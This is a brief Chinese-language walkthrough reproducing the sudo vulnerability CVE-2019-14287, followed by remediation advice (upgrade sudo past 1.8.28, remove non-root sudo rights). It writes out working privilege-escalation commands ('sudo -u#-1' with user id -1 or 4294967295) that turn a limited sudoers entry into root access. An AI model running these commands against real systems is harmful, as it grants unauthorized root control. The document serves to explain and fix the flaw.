1. 首先创建onetiger用户, 然后在/etc/sudoers中添加onetiger用户的sudo命令, 即/etc/sudoers中添加下面代码(root身份)

onetiger ALL=/bin/vim

2. 登录onetiger用户

3. 以onetiger用户执行下面命令, 以用户id -1或4294967295运行后, 再0(用户id是0是root)用户运行命令成功.

sudo -u#-1 vim /etc/sudoers

sudo -u#0 vim /etc/sudoers

4. 解决办法.

4.1 CVE-2019-14287 漏洞影响 1.8.28 之前的 Sudo 版本, 将 sudo 软件包更新为最新版本.

4.2 禁用非root用户的sudo权限.